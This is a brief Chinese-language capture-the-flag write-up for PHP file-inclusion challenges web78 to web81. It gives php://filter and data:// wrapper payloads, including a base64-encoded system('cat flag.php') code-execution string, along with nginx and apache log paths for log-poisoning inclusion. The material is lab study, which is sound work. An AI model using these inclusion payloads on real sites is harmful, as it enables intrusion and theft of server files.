- web78
读取源代码:
心想,就这?
直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
直接:
http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
成功获取flag.php的文件内容,在线网址解base64:
https://tool.oschina.net/encrypt?type=3
- web79
此题和也是利用PHP中的伪协议:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);
- web80
本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
nginx: /var/log/nginx/access.log
apache: /var/log/httpd/access_log
bp拦截:
- web81
此题和80题是一样的方法。